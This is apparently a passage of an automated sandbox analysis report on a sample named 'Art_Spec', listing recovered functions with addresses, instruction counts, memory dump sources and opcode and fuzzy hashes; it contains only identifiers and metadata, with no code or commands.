                                                        • Opcode ID: 9ef93632830de2ca164146a603b4ae53dcdf30f1bb7c0c0c97db2dc73ee5a94e
                                                        • Instruction ID: 47735fed80686a682c2df42d512b53dd8cdfddc47f30a7a76742ec132487f296
                                                        • Opcode Fuzzy Hash: 9ef93632830de2ca164146a603b4ae53dcdf30f1bb7c0c0c97db2dc73ee5a94e
                                                        • Instruction Fuzzy Hash: D9012B322002039BE7206F5ADDC4A9BBF75EFD9668B45062FF6411A671CB306841CB92
                                                        Function 01452000 Relevance: .8, Instructions: 757COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 17ba56c50b1d3f4122a01c2c4d102064b457ae879837f556151156ce00f3f59e
                                                        • Instruction ID: 492ebc85b3d1f10d5883457f933c19becffeefc8c4014712ed0ce57183b87f28
                                                        • Opcode Fuzzy Hash: 17ba56c50b1d3f4122a01c2c4d102064b457ae879837f556151156ce00f3f59e
                                                        • Instruction Fuzzy Hash: E542B136608301DBD765CF68C890E6BBBE5AB94304F08492FFE8697362D7B0D845CB52
                                                        Function 01448158 Relevance: .6, Instructions: 617COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
                                                        • Instruction ID: 07379212290d5343c860e2aa76d84ee4256dd383e6d49ce479dd5b4698ea8c61
                                                        • Opcode Fuzzy Hash: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
                                                        • Instruction Fuzzy Hash: 18424E75A0021A8FEB25CFA9C841BAEBBF5BF48304F14809AE949AB251D7349D85CF50
                                                        Function 013C2840 Relevance: .6, Instructions: 605COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f70a75398280866e8f3a667cbd09663d4ba2fcba0cf5c0aa543fff3e21b9cb9a
                                                        • Instruction ID: 9ae6e5eeef933411d908b7768744ca42ec4f2752a924e05d093735d0c5c527da
                                                        • Opcode Fuzzy Hash: f70a75398280866e8f3a667cbd09663d4ba2fcba0cf5c0aa543fff3e21b9cb9a
                                                        • Instruction Fuzzy Hash: 6532EF70A007558BDB25CF69C8447BEBBF2BF84704F16452ED84A9B3A9D7B5E802CB50
                                                        Function 0145A118 Relevance: .6, Instructions: 591COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 77828ba64fff03b37547fa4e5d3e442368ce97206aa831e8fd6ab5823cfeaf62
                                                        • Instruction ID: 31693a9e7d725d8395b0686ede8bd8cd50d418a57adb348ba8c55ff7d2b19e1a
                                                        • Opcode Fuzzy Hash: 77828ba64fff03b37547fa4e5d3e442368ce97206aa831e8fd6ab5823cfeaf62
                                                        • Instruction Fuzzy Hash: 5822CE702046618BEBA5CF29C094772BBE1AF45344F28865BED868F3A7E735D442CB61
                                                        Function 013B6A50 Relevance: .5, Instructions: 548COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: acbe886243cb5a404db981cd72067780db6624bfe34c9139c511af991e210ad4
                                                        • Instruction ID: 4942912d9609b0169f1fcc80beac4b52a4e80df631edd1bfe62d22dc76c8aeb8
                                                        • Opcode Fuzzy Hash: acbe886243cb5a404db981cd72067780db6624bfe34c9139c511af991e210ad4
                                                        • Instruction Fuzzy Hash: C6329FB1A00209CFDB25CF69C480BAABBF5FF48304F14456AEA55ABB56E734E841CB50
                                                        Function 013D4A35 Relevance: .4, Instructions: 423COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                        • Instruction ID: d546fed8204e1a3bd89e71d4397773607af63a51a197d121b2728140c028dea2
                                                        • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                        • Instruction Fuzzy Hash: 2AF18072E0020A9BDF15CFA9E580BAEBBF5FF48718F04812AE905AB755E774D841CB50
                                                        Function 0144892B Relevance: .4, Instructions: 386COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 036060ac948a23cfbc24f68b00cca165af9a00497508f54268c75b5990beedc5
                                                        • Instruction ID: f7e19fb5974fe02c59bd357d5b386a492f27eaa964cf8e954d6655b4aa4b19b4
                                                        • Opcode Fuzzy Hash: 036060ac948a23cfbc24f68b00cca165af9a00497508f54268c75b5990beedc5
                                                        • Instruction Fuzzy Hash: EED1C071E0060B9FEF15CFA9C841AFFB7F1AF88304F18816AD955A7251E735E9068B60
                                                        Function 013B65D0 Relevance: .4, Instructions: 383COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6953a03bb36781df7cc7ffd60fc7a301d35e47afa8436831e1a3baa431a8be5e
                                                        • Instruction ID: 0e5b7902f26de3929fcfbae9ce4e1622b67bb8185a15036367489a84fb67251a
                                                        • Opcode Fuzzy Hash: 6953a03bb36781df7cc7ffd60fc7a301d35e47afa8436831e1a3baa431a8be5e
                                                        • Instruction Fuzzy Hash: 65E181B1608341CFC715CF28C5D1AAABBE0FF89318F05896DE69587752EB31E905CB92
                                                        Function 013A8397 Relevance: .4, Instructions: 380COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58086cd98e11042ae540ee16d7503be1de2eefa00fb89b8f55806e40a4fe1cc5
                                                        • Instruction ID: c5666e317972d7f94bf33756eedd99ef4f934b1f55f2ec7d4844e4d2fdb5ba91
                                                        • Opcode Fuzzy Hash: 58086cd98e11042ae540ee16d7503be1de2eefa00fb89b8f55806e40a4fe1cc5
                                                        • Instruction Fuzzy Hash: 80D10371A0020A8BDB15DF29C880EBB7BB5FF54309F4446AEEA16DB2D0EB34D951CB50
                                                        Function 01438243 Relevance: .3, Instructions: 322COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                        • Instruction ID: 3634af39eba01431c25e9dbab5995feffe0a222d2431b9bc0873dbd9d115a000
                                                        • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                        • Instruction Fuzzy Hash: 8AB16274A006069FDF24DB99C940AABFBB9FFD8304F10456EBA12977E1DA35E905CB10
                                                        Function 013C0535 Relevance: .3, Instructions: 300COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                        • Instruction ID: bae3b0c6569c1a4ce69d3e20fa99864372206e039fb20f66be35b0e0ed6a4a73
                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                        • Instruction Fuzzy Hash: 41B13635604686DFDB19CBA8C850BBEBBFAAF84708F18015AE6529B395D730ED41CB50
                                                        Function 013B83C0 Relevance: .3, Instructions: 281COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8b2497953fc54c89ea9e2a2afd4017126234c780e25a03c6eeab11129acdbd7b
                                                        • Instruction ID: 1650673bd1b780b339df0a0d7546776a040494a6c24fe9eec15f3a877b7ebcef
                                                        • Opcode Fuzzy Hash: 8b2497953fc54c89ea9e2a2afd4017126234c780e25a03c6eeab11129acdbd7b
                                                        • Instruction Fuzzy Hash: 50C14774208341CFD764DF19C484BABB7E8BF88708F44496EEA8987791E774E904CB92
                                                        Function 013AC427 Relevance: .3, Instructions: 280COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 079831cf5c8cf3111051660c41a96b51c658fcf3ea2b5971434d89ab5d073fe8
                                                        • Instruction ID: dc7c8b87994a9070705a072a4cf637f69aa0c02711669dc76d9b4638a0846e68
                                                        • Opcode Fuzzy Hash: 079831cf5c8cf3111051660c41a96b51c658fcf3ea2b5971434d89ab5d073fe8
                                                        • Instruction Fuzzy Hash: 24B19470A002698BDB25CF59C890BA9B7B5EF44704F5485EAE54AEB391EB30DDC5CF20
                                                        Function 013DE5E7 Relevance: .3, Instructions: 278COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76a5ae9efe2b6088291e775f2be00edce8df0e7bb686af16867233f904dcb486
                                                        • Instruction ID: f4372e71fab28224e28841624a4077d71157d4047697cb242cf28602bd330a20
                                                        • Opcode Fuzzy Hash: 76a5ae9efe2b6088291e775f2be00edce8df0e7bb686af16867233f904dcb486
                                                        • Instruction Fuzzy Hash: 70A12832E006199FEB21DB5CD844BAEBFB4BB00758F050126EA10AB2E5D7749D4ACBD1
                                                        Function 013F0185 Relevance: .3, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a83b1cfeeeb902fd9047c3e37d6912410631e46aabfb7531a63fae07fbf3d9d
                                                        • Instruction ID: 9f6e04e2cab45b0f821a9d3206604490161b1caa754e383bd2045b3d90fa16e0
                                                        • Opcode Fuzzy Hash: 0a83b1cfeeeb902fd9047c3e37d6912410631e46aabfb7531a63fae07fbf3d9d
                                                        • Instruction Fuzzy Hash: 26A1C771B00626DBDB29CF6DC590B6AB7E6FF54318F04402EEB05A7292DB74E851CB50
                                                        Function 01484500 Relevance: .3, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
                                                        • Instruction ID: 6a5c4765c2292b3294126db13a5f7d5515c0f805843a2f15706b6e757d250d6e
                                                        • Opcode Fuzzy Hash: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
                                                        • Instruction Fuzzy Hash: 38A1CC72A10212DFC711EF18C980B6ABBE9FF58708F4A452EE6499B760D734ED01CB91
                                                        Function 014360E0 Relevance: .3, Instructions: 264COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
                                                        • Instruction ID: 736a6d833cfbef1ec66fe06ae8b6d56f8ef6017a90a30e58949a52f2937e4c3a
                                                        • Opcode Fuzzy Hash: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
                                                        • Instruction Fuzzy Hash: 02917371D00216BFDF15DF68D884BAEBFB5AB88710F16415AE610EB361D734EA019BA0
                                                        Function 013CE3F0 Relevance: .3, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a542bcc5a11fb1a44585e1d65d01fad94f22aeb4b6e59dbe1635519061f020f
                                                        • Instruction ID: a4387c32ef07413e9243568ba2159843c7aa2b27d4767fdb18dc47828a605437
                                                        • Opcode Fuzzy Hash: 5a542bcc5a11fb1a44585e1d65d01fad94f22aeb4b6e59dbe1635519061f020f
                                                        • Instruction Fuzzy Hash: E2910532A00616CBEB24DB5DC444B7ABFA6EFA4B18F19407EED05AB394EA34DD01C751
                                                        Function 01406ACC Relevance: .2, Instructions: 226COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0834032dc80e9fdd04e25e436cf7563fea7c64c80c8c9e69a67b3ee3ab5aa3c
                                                        • Instruction ID: 7558575c35a581f1b6363a56ef1af8395436e6605dde852397077e64ed8014e4
                                                        • Opcode Fuzzy Hash: c0834032dc80e9fdd04e25e436cf7563fea7c64c80c8c9e69a67b3ee3ab5aa3c
                                                        • Instruction Fuzzy Hash: 5681B2B1A006169BDB25CF6AC940ABFBBF9FB48700F05843EE546E7690E334D951CB94
                                                        Function 0147AB40 Relevance: .2, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction ID: b7e31d643c854e9191127b1e1b4de2c334feb31c274a0ef5fc34072cf8352ee9
                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction Fuzzy Hash: 93816231A002069FDF19CF59C890AFEBBB6EF94310F28856ED9169B364D734E902CB50
                                                        Function 013A6D10 Relevance: .2, Instructions: 216COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e078b013a72bea460121906b3ecc7ca78af98f0f8b3177a915a9c832daa7fcc5
                                                        • Instruction ID: 0a1709f4da725361fe0fae2e6d24e7888a18e95d00140861b694ae49c5f940fc
                                                        • Opcode Fuzzy Hash: e078b013a72bea460121906b3ecc7ca78af98f0f8b3177a915a9c832daa7fcc5
                                                        • Instruction Fuzzy Hash: A1718571A447029BDB22DE1AC580A6BB7E4AF44258F04493BE959D73A2D730EC858BD2
                                                        Function 013EE284 Relevance: .2, Instructions: 212COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4fbd3eb5823a89f300f09b32e0072868763e74a8fcbb7597a04a69d326c5367
                                                        • Instruction ID: 66746a1cc2814f5e71a467deabf7eaff4ea1200506d1e34174fee62cfc16f1d0
                                                        • Opcode Fuzzy Hash: b4fbd3eb5823a89f300f09b32e0072868763e74a8fcbb7597a04a69d326c5367
                                                        • Instruction Fuzzy Hash: A8814C71A00719EFDB25DFA9C884AEEBBF9FF48358F10442AE555A7290D730AC45CB60
                                                        Function 013CC640 Relevance: .2, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63da8c2e4cc54df79fb6709caa3a0e0e56bfd3f85da96d45073e5efe9f304382
                                                        • Instruction ID: c31259b6dad002b3cb007cb05d66569a13fa8af4eff40744ebfd2b5ff895750b
                                                        • Opcode Fuzzy Hash: 63da8c2e4cc54df79fb6709caa3a0e0e56bfd3f85da96d45073e5efe9f304382
                                                        • Instruction Fuzzy Hash: 6B71BB75D0022A9FCB25CF59D9907BEBBB5FF48B14F59411EE946AB364E3309801CBA0
                                                        Function 01448D6B Relevance: .2, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c9f86c7a2dbe0ef523555012f514428e5d9364992fa8d4fea407b9e9b095735
                                                        • Instruction ID: 18f49270b0f8c454f12144c888a5e83bdb6ea82b9e66eafcb8cbf61d4bba3c52
                                                        • Opcode Fuzzy Hash: 7c9f86c7a2dbe0ef523555012f514428e5d9364992fa8d4fea407b9e9b095735
                                                        • Instruction Fuzzy Hash: 0C71C270904257AFEB15CF99C840AFABBF1EF45314F04805AE994DB322E335DA46C7A0
                                                        Function 014647A0 Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ff378d63de08f4a7ba659a048b937ba741f43b4b1f677b97844abb07a5521a12
                                                        • Instruction ID: 23b39bcb342e74668659bd8aa6ac7eda7194612f8a21a2040a663955dc670192
                                                        • Opcode Fuzzy Hash: ff378d63de08f4a7ba659a048b937ba741f43b4b1f677b97844abb07a5521a12
                                                        • Instruction Fuzzy Hash: 89717F70A00205EFDF24CFA9D944A9EBFFCEB90348B5A815BE614A72B8C7318D41CB55
                                                        Function 013C260B Relevance: .2, Instructions: 201COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c63b309e2c8da2dffdd377176af39793dfc6549d521bbbd638de097d4285286
                                                        • Instruction ID: 8ffbda48de1c1d0b2f73a127114725f10870f010abbf514222c118279f7058af
                                                        • Opcode Fuzzy Hash: 4c63b309e2c8da2dffdd377176af39793dfc6549d521bbbd638de097d4285286
                                                        • Instruction Fuzzy Hash: 8971CE356046428FD311DF2CC480B6BB7E5FF84B18F0585AAE8998B762DB74DC45CBA1
                                                        Function 0143035C Relevance: .2, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction ID: d4fde9f263bcdcbb8656af537e9bae2d6440d553b61b5f1f165d39b18b824483
                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction Fuzzy Hash: 7E715F71A0061AAFDB11DFA9C944EDEBBB9FF98704F10456AE505E7290DB34EE01CB50
                                                        Function 014462A0 Relevance: .2, Instructions: 198COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5787a0b256033e9685c60b23c3805b0118e54d637e14bde8b5f137ac46d32ae6
                                                        • Instruction ID: e7f6dc49a5b1e5c75d399b4f9c31d256325678b236bf5cd6e429d7b4deb50d07
                                                        • Opcode Fuzzy Hash: 5787a0b256033e9685c60b23c3805b0118e54d637e14bde8b5f137ac46d32ae6
                                                        • Instruction Fuzzy Hash: 9271EF32200B01EFFB22DF18C844F5BBBA6EB45724F16852AE6168B2B0D774E945CB50
                                                        Function 013B8AA0 Relevance: .2, Instructions: 197COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ad754cc36b199072b456af1d125f882e9434a4f09a75f9507bcafdb55db5174a
                                                        • Instruction ID: bca2b1e7ec33a5903ef592ff955fb1be76cc71f8b7df95af8de46472c8fdab14
                                                        • Opcode Fuzzy Hash: ad754cc36b199072b456af1d125f882e9434a4f09a75f9507bcafdb55db5174a
                                                        • Instruction Fuzzy Hash: AE81C271A04305CFDB24CF68D584BEE7BB9AB48314F2A416EDA00AB7A5D7B49D41CB90
                                                        Function 0146A250 Relevance: .2, Instructions: 184COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53b8ff891191f0b7c5659badeea91e56f79bb24cabf0f46fe14b512804bc31db
                                                        • Instruction ID: acef328f9bfdf6800d8d97b74fcd895c6af602dbc696ca7d1a54ea96c04979b2
                                                        • Opcode Fuzzy Hash: 53b8ff891191f0b7c5659badeea91e56f79bb24cabf0f46fe14b512804bc31db
                                                        • Instruction Fuzzy Hash: D851BD72504B12AFD711DA68C844B5BBBECEB84758F11493EFA40EB260D770ED0587A3
                                                        Function 01458350 Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26289fdaf23c0d81b74df613b9ec76c29834ecc95986266b5eddf9046d6d0a27
                                                        • Instruction ID: 64aca24084fed538e348e8e8c5fe3e625b8d11ce98ccd3e7fb8bf2ac05c00830
                                                        • Opcode Fuzzy Hash: 26289fdaf23c0d81b74df613b9ec76c29834ecc95986266b5eddf9046d6d0a27
                                                        • Instruction Fuzzy Hash: 7D51CF70900706DBD761CF5AC880AABFBF8BF64714F10462EEA52976B2DB70A541CB50
                                                        Function 013EE443 Relevance: .2, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f844c86e17d93e5575183929f2be22c5561d5e30dfbfdad54e7dc955173a1be9
                                                        • Instruction ID: c68df74d752fa9066be2e15d892686d30b9913b3278bcb1832eda964a6c93155
